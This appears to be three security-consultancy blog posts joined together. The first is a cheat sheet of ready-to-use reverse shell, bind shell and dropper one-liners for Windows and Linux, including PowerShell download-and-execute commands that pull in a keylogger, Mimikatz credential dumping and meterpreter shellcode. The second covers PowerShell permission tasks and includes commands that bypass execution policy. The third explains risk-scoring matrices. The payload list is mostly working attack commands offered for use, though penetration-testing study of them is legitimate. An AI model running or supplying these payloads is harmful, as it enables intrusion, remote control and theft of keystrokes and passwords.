ONE LINER SHELL

ONE LINER SHELL

One Liner Shell, Draws attention to the different types of shell and droppers which plays a most important role during penetration testing. These one-liners can be used for gaining access to the system. These scripts will be used by red teamers during their pentest.Shells are described as a small piece of code or program which is used to gain a command execution on a specific device. There are two types of shells,

1. Reverse Shell
2. Bind Shell

REVERSE SHELL

Reverse shell is a type of shell in which the victim machine connect back to the attacker machine. The attacker machine runs a listener on a specific port on which it receives the connection by performing command or code execution.

BIND SHELL

Bind shell is a type of shell in which the attacker creates a communication port or a listener on the victim machine and waits for the attacker to connect.

I was impressed by a tool, so I have decided to write this blog. Tool link: https://github.com/D4Vinci/One-Lin3r. To use these shell in your real-time scenario, you need to fill up the IP address and the port number.

We will be discussing the reverse shell and dropper for windows and Linux platforms.

1. WINDOWS PAYLOADS

   1. Microsoft's SyncAppvPublishingServer

   2. WinInstaller_dropper

   3. Win_Remote_Management

   4. Execute C# files

   5. mshta hta

   6. netcat bind shell

   7. netcat reverse shell

   8. rundll32 dropper

   9. escalate services

   10. Key logger

   11. meterpreter shell

   12. mimikatz passwds

   13. Socket reverse

2.  LINUX PAYLOADS

   1. bash reverse

   2. netcat bind

   3. piped reverse

   4. netcat reverse

   5. sockets reverse perl

   6. socket reverse php

1      WINDOWS PAYLOADS

            Here are some of following commands for shell in Windows platforms. We need to focus on the payload part and if you are willing to edit the payload, go for it.

MICROSOFT’S SYNCAPPVPUBLISHINGSERVER

The Sync-AppvPublishingServer cmdlet initiates the Microsoft Application Virtualization (App-V) publishing refresh operation in the context of the current user. The publishing refresh connects to all added servers on  the client and exposes new App-V packages and their respective extension points to the user. Using Microsoft’s SyncAppvPublishingServer to download and execute a PowerShell file.

Type = Dropper
Payload = SyncAppvPublishingServer.exe "n;((New-ObjectNet.WebClient).DownloadString('{mention the url of the payload}') | IEX

WININSTALLER_DROPPER

Windows Installer is a software component and application programming interface (API) of Microsoft Windows used for the installation, maintenance, and removal of software. Passing msi file URL to the Windows installer will download and execute the payload.

type = Dropper
Payload = msiexec /i {mention the msi file URL here}

WIN_REMOTE_MANAGEMENT

Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. Windows Remote Management provides the ability to remotely execute wmi commands

type = execute
Payload = winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="{your_command_here}"}
Execute C# files

Using the .NET compiler to compile a c# payload locally that can then be executed.

Type = Execute

Payload = C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe {your_cs_file_here}

MSHTA HTA

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). Uses mshta command to download and execute your hta file.

Type = Dropper

Payload = mshta {your hta file url}

NETCAT BIND SHELL

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to setup a bind shell

Type = bind shell

Payload = nc -nv 4444 -e cmd.exe

NETCAT REVERSE SHELL

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to establish a reverse shell

Type = reverse 
Payload = nc -nv {ip} {port} -e cmd.exe
rundll32 dropper

The rundll32.exe process is responsible for running DLLs and placing its libraries in the memory. Using rundll32.exe to download and execute a PowerShell file.

Type = Dropper
Payload = rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('{your}');"

Escalate services

This is a power shell script which is used from power tools which are written by power Shell Empire. This script is used for escalation processes, so this script will search for vulnerable service privilege opportunities using the script from Power Tools

Type = escalation
Payload = Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

KEY LOGGER

Here a power shell script is been used to retrieve keystrokes. Using a script from powersploit to log keyboard strokes to C:\Users\Public\key.log

Type = Local
 Payload = Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1');Get-Keystrokes -LogPath C:\Users\Public\key.log

METERPRETER SHELL

Metasploit meterpreter reverse HTTPS shell using a PowerShell script from powersploit

Type = Reverse
Payload = Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost {ip} -Lport {port} -Force

MIMIKATZ PASSWORDS

Grabbing passwords from memory using Invoke-mimikatz script from PowerSploit

Payload = Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

SOCKET REVERSE

Python socket to connect back & execute data with sub process.

Type = reverse

Payload = python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call("cmd");'

LINUX PAYLOADS

Bash reverse

Interactive shell via bash’s builtin /dev/TCP.

Type = Reverse
Payload = bash -i >& /dev/tcp/{ip}/{port} 0>&1

NETCAT BIND

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to setup a bind shell

Type = bind
Payload = nc -lvp 4444 -e /bin/sh

NETCAT REVERSE

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Establish a reverse connection with netcat.

Type = Reverse
Payload = nc -e /bin/sh {ip} {port}

PIPED REVERSE

Uses a tool exists on most of the systems and the output of the commands will be piped back.

Type = Reverse
Payload = exec 5<>/dev/tcp/{ip}/{port} && cat <&5 | while read line; do $line 2>&5 >&5; done

SOCKETS REVERSE PERL

Uses Perl sockets & the output of your commands will be piped back.

Type = reverse

Payload = perl -e 'use Socket;$i="{ip}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

SOCKET REVERSE PHP

Uses PHP sockets & exec to create a reverse shell.

Type = reverse
Payload = php -r '$sock=fsockopen("{ip}",{port});exec("/bin/sh -i <&3 >&3 2>&3");'

CONCLUSION

In today’s world, the shell is becoming very famous, interesting and  increasing in numbers. Mostly attackers preferred to hack or compromise a system using shell only because they are very flexible regarding modifying the code. Major Cyber-attacks are performed using the reverse shell. So users need to be very careful while handling any tools or files. Before executing a tool or a file try to scan the file for any malware detection (you can use some online scanners such as https://www.virustotal.com/#/home/upload or https://nodistribute.com/ ).

Be prepared and be safe

AUTHOR

Venkatesh C.S

Security Engineer

Briskinfosec Technology and Consulting PVT LTD

Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

SECURITY TASKS USING POWERSHELL

SECURITY TASKS USING POWERSHELL

PowerShell is a  advanced admin tool for Windows operating system. End users with advanced knowledge or those who have worked with an older version of windows may be much familiar with the command prompt via which you can run commands and scripts. PowerShell is similar but a lot more advanced regarding functionality.

This blog gives you some advanced functions for configuring management and automated tasks. Powershell includes both scripting language and command line shell. It is built on.Net Framework. Its also offers you Integrated Scripting Environment (ISE), which gives you a GUI where you can naturally do all your scripting.

we will see how effectively we can use PowerShell on security-related tasks,

CONTENTS

1. Understanding Execution Policy

2. Overriding Execution Policy

3. Listing NTFS Permissions

4. Clone NTFS Permissions

5. Adding Permissions

6. Removing Permissions

7. Checking Administrator Privileges

UNDERSTANDING EXECUTION POLICY

 Execution policy enables a user to determine which PowerShell scripts will be allowed to run on your computer. There are four different execution policies are available in the PowerShell.

They are

• Restricted – no scripts can run. Interactive mode only can be used.
• AllSigned – the scripts which are signed by the trusted publisher can be able to run
• RemoteSigned –   scripts which are downloaded must be approved by a trusted publisher before they run.
• Unrestricted – there will be no restriction on running any PowerShell scripts.

This command will show you current execution policy.

 PS C:\Users\proxy_000> Get-ExecutionPolicy
Restricted

End users should use the RemoteSigned. It will allow the user to run local scripts, but it won’t enable scripts from outside the network or downloaded scripts from the internet.

Professional scripters can use “Bypass” which allow you to run any script regardless of location.

Here is a command to change execution policy for your user account.

PS C:\Users\proxy_000> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force

PS C:\Users\proxy_000> Get-ExecutionPolicy

Bypass

PS C:\Users\proxy_000>

OVERRIDING EXECUTION POLICY

 Execution policy is not a security boundary to protect you from attackers. It just acts as a seat belt to protect you. There are many other ways to override the execution policy and execute the scripts or commands.

PS C:\Users\proxy_000> Get-Content ‘c:\evilscript.ps1’ -Raw | powershell.exe -nonprofile - 

LISTING NTFS PERMISSIONS

 To view  NTFS permission for folders and files use Get-Act. At first, It won’t show you the actual permission. But we can make visible using this :

PS C:\Users\proxy_000> Get-Acl -path $env:windir | Select-Object -ExpandProperty Access

CLONE NTFS PERMISSIONS

  NTFS access permission is complicated and tricky. To quickly assign NTFS permission to a new folder, you can merely clone permission from another folder that you know has the correct permission applied.

$OriginalPath = “$env:temp\sample”
New-Item -Path $OriginalPath -ItemType Directory

 to assign correct permission to folder “proxy” manually

Explorer.exe “/Select,$OriginalPath.”

 Right-click the proxy folder and choose properties and then click the security tab. Now add security permission you need to apply

When your prototype folder is correctly configured. Use this code to read information about security

$sddl = (Get-Acl $OriginalPath).Sddl

 From this point, you don’t need your prototype folder anymore. It was required to create SDDL definition string.

$newpath = “$env:temp\NewFolder”
md $newpath
$sd = Get-Acl -Path $newpath
$sd.SetSecurityDescriptorSddlForm($sddl)
Set-Acl -Path $newpath -Aclobject $sd

ADDING PERMISSIONS

Adding new permission to an existing security descriptor, first, create an appropriate AccessRule object and configure it.

This script adds a new FileSystemAccessRule to the security descriptor of a file, granting read and write access to proxydomain\proxyaccount.

Make sure you adjust both user account and filename before you test the code:

$colRights = [System.Security.AccessControl.FileSystemRights]’Read, Write’
$InheritanceFlag = [System.Security.AccessControl.InheritanceFlags]::None
$PropagationFlag = [System.Security.AccessControl.PropagationFlags]::None
$objType =[System.Security.AccessControl.AccessControlType]::Allow
$objUser = New-Object System.Security.Principal.NTAccount(‘proxydomain\proxyaccount.’)
$objACE = New-Object System.Security.AccessControl.FileSystemAccessRule `
($objUser, $colRights, $InheritanceFlag, $PropagationFlag, $objType)
# get original SD

$catACL = Get-Acl ‘C:\proxy\pr0xy.txt’
 # add permission
$catACL.AddAccessRule($objACE)
 # write back the appended SD
Set-Acl ‘C:\proxy\pr0xy.txt’ $catACL

REMOVING PERMISSIONS

 To remove a permission from a security descriptor, get access to the Acl entries, and pick the ones to delete and write back the changed security descriptor.

 $catACL = Get-Acl c:\proxy\pr0xy.txt
$unwanted = $catACL.Access |
Where-Object { $_.IdentityReference.Value -eq ‘proxydomain\proxyaccount’ }
$unwanted | ForEach-Object { $null = $catACL.RemoveAccessRule($_) }
Set-Acl -Path c:\proxy\pr0xy.txt -AclObject $catACL

CHECKING ADMINISTRATOR PRIVILEGES

There are many ways to find out if a script runs been elevated. Here’s a straightforward approach that uses whoami.exe (works withWin7/Server 200 R2 or better):

 (whoami.exe /all | Select-String S-1-16-12288) -ne $null

If you do not have whoami.exe, or if you are looking for a more integrated way, you can use a line that is a little longer but identifies Admin status directly, without calling an external program:

(New-Object System.Security.Principal.WindowsPrincipal([System.Security.
Principal.WindowsIdentity]::GetCurrent())).IsInRole([System.Security.Principal.
WindowsBuiltInRole]::Administrator)

CONCLUSION :

 As we discussed in this blog, PowerShell is an advanced admin tool which is capable of performing above mentioned task. By executing these tasks, the admin could save much time. This allows  to avoid attackers to get into our system .

Briskinfosec offers periodic system hardening solutions to bring down the risk level in the organization, our constructive and customized solution will help organization from serious threats against system hardening.

AUTHOR

Venkatesh C.S

Security Engineer

Briskinfosec Technology and Consulting PVT LTD

Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

Related Blogs :

1.   Two Phases of Powershell- Offensive and Defensive
2.  How to use Powershell as Handy like Shell Script?

RISK MANAGEMENT: HOW TO CALCULATE RISK?

RISK MANAGEMENT: HOW TO CALCULATE RISK?

INTRODUCTION :

Risk Assessment and Risk Management is done with the calculation of severity and likelihood. Severity is considered based on the level of the disaster which will impact in the future of the organisation. Likelihood is deemed to be found on the way risk which will probably change the organisation. The Risk calculation by analysing how the impact occurred and how it can be mitigated based on the calculation.

It is also a meaningful way to protect organization business, at the same time acquiesce with the law and procedure. It helps to focus on the risks that matters in the organization. In many scenarios, direct measures can be summed up to control risks, which means smooth, cheap and effective measures to ensure your most valuable asset.

In Risk assessment and risk management process, we are going to discuss about the how process is done. Here are the below contents.

1. Identify the hazards

2. How the risk has happened

3. Evaluate the risks

4. Scale for the Likelihood

5. Scale for the Consequence

6. Treating the risk occurred

7. Review Assessment

8. Conclusion

STEP 1 – IDENTIFY THE HAZARDS:

The risk is vital to understand the context in which it exists. It needs to define the relationship between organization and environment that functions in, so that outline of the organization facing risk is evident.

• Look at location, exposure to data;
• Interrogation with the contiguous people;
• To check any recent incidents.

STEP 2 – HOW THE RISK HAS HAPPENED:

This step denotes that to identify the likelihood and consequence of it are occurring. The risk can be of any type such as physical, ethical, financial.

The physical risks are those involving the damage to the organizational assets such the infrastructure equipment, injuries for the employees and also if the condition of the weather is terrible which affects routine services.

The Ethical risks involve potential harm to the reputation and services of the organization. The trust of the organization gets degraded when the data breach or leakage has occurred.

The Financial risks which involve the loss of organizational assets. Any theft of financial breach occurred on the internet.

 STEP 3 – EVALUATE THE RISKS:

Risk evaluation denotes the analysing the likelihood and consequences of the threat which is pointed and making the decision of risk factors were potentially have an effect and needed to be made a priority. The level of the risk is considered based on the likelihood and consequence of the impact.

The Evaluation is done by comparing the impact of the risk found during the analysis process with risk criteria previously impacted by the organization.

The criteria for evaluating the risks

SCALE FOR THE LIKELIHOOD:

Severity	Description
5	Certain: It will probably occur or often impact several times per year
4	Likely: Likely to arise once per year
3	Possible: It will occur five years once the period
2	Unlikely: Disaster occurred once in 10+ years
1	Rare: Barley occurs

SCALE FOR THE CONSEQUENCE:

Severity	Description
5	Catastrophic
4	Major
3	Moderate
2	Minor
1	Negligible

Calculation of Risk priority

Risk=Likelihood * Impact

	IMPACT
LIKELIHOOD		1	2	3	4	5
	1	Very Low	Very Low	Low	Low	Medium
	2	Very Low	Low	Medium	Medium	High
	3	Low	Medium	Medium	High	High
	4	Medium	Medium	High	High	Very High
	5	High	High	Very High	Very High	Very High

STEP 4 – TREATING THE RISK OCCURRED:

Risk Treatment identifies the range of options for treating the risk, preparing the risk treatment plans and applying those plans. Options for treatment need to be proportion to the significance of the risk.

According to the standard, there are various options existed:

• Accepting the risk
• Avoiding the risk
• Reducing the risk
• Transferring the risk
• Retaining the risk
• Financing the risk

STEP 5 – REVIEW ASSESSMENT

Reviewing is an ongoing part of risk management which is the integral step of the process. It is also an essential part of all business functions which need to monitor and treated. Monitoring and reviewing the risk is to make sure that the information which generated by the risk management process is logged, used and maintained.

CONCLUSION :

The Risk Assessment and Mangement procedure above should be implemented by organisations to secure the work activities. However, some other methods contain activities, where the work procedure covers employees undertaking work experience within the organisation. The risk management process which need be implemented in the operations and governance of every organization. However, no ‘one size fits all’ way of embedding the risk management. Preferably the process must be enhanced to fit the size, complexity, industry competition and environmental uncertainty faced by the organization.

Briskinfosec offers a comprehensive approach to manage the risk and compliance in the organization more effectively. Our customized solution meets the policies, procedure, technologies and competencies in several stream of work across the risk management categories of governance, process and technology.

AUTHOR :

Dharmesh B

Security Engineer

Briskinfosec Technology and Consulting Pvt Ltd.,

https://www.linkedin.com/in/dharmeshbaskaran/